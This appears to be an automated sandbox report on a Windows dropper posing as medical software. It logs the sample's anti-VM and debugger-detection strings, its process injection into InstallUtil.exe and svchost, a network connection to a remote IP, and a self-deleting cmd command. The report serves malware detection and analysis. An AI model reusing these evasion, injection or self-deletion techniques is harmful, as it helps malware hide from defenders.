                      Source: C:\Users\user\Desktop\medicalanalysispro.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmprph.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmprph.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: medicalanalysis.exe PID: 3756, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 55AB83A
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: svchost.exe, 00000007.00000002.2328734842.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                      Source: medicalanalysis.exe, 00000001.00000002.2224296580.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2218187485.00000000027E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                      Source: svchost.exe, 00000007.00000002.2328734842.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU
                      Source: svchost.exe, 00000007.00000002.2328734842.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHAK#
                      Source: svchost.exe, 00000007.00000002.2328734842.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                      Source: medicalanalysis.exe, 00000001.00000002.2218187485.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: medicalanalysis.exe, 00000001.00000002.2224296580.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2218187485.00000000027E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                      Source: svchost.exe, 00000007.00000002.2328734842.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                      Source: svchost.exe, 00000007.00000002.2328734842.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TORUNS.EXEDUMPCAP.EXEDE4O#
                      Source: svchost.exe, 00000007.00000002.2328734842.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory allocated: 2170000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory allocated: 23E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory allocated: 21F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeMemory allocated: 980000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeMemory allocated: 23A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeMemory allocated: 21D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeCode function: 10_2_0098CA29 rdtsc 10_2_0098CA29
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2345
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe TID: 1148Thread sleep count: 41 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe TID: 1148Thread sleep time: -40959s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe TID: 6640Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE7204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7BDE7204C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE600B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,16_3_00007DF4AE600B80
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE764E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF7BDE764E4
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: svchost.exe, 00000010.00000003.2504690762.0000018B2955E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
                      Source: svchost.exe, 00000010.00000003.2504690762.0000018B2955E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLinkn
                      Source: svchost.exe, 00000010.00000002.2741281341.0000018B29413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@"C)
                      Source: svchost.exe, 00000007.00000003.2234168515.00000000052E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: medicalanalysis.exe, 00000001.00000002.2218187485.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: svchost.exe, 00000007.00000002.2328599758.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2741281341.0000018B29413000.00000004.00000020.00020000.00000000.sdmp, wmprph.exe, 00000015.00000002.2960898041.00000242C8D08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000007.00000002.2328624748.0000000003012000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                      Source: medicallanalysis.exe, 0000000A.00000002.2242619491.000000000054C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: medicalanalysis.exe, 00000001.00000002.2218187485.0000000002427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: svchost.exe, 00000007.00000003.2234168515.00000000052E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: medicalanalysis.exe, 00000001.00000002.2217543492.0000000000621000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2506449685.0000013A8620C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: svchost.exe, 00000007.00000002.2328709910.000000000305C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP UDP Service Provider
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeCode function: 10_2_0098CA29 rdtsc 10_2_0098CA29
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE730EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7BDE730EC
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_3_02B70283 mov eax, dword ptr fs:[00000030h]7_3_02B70283
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE78494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7BDE78494
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE78790 SetUnhandledExceptionFilter,0_2_00007FF7BDE78790
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.37.175.218 7982Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 449000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 478000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 47C000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 47E000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: EC8008Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE712EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00007FF7BDE712EC
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmprph.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmprph.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6059B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,16_3_00007DF4AE6059B0
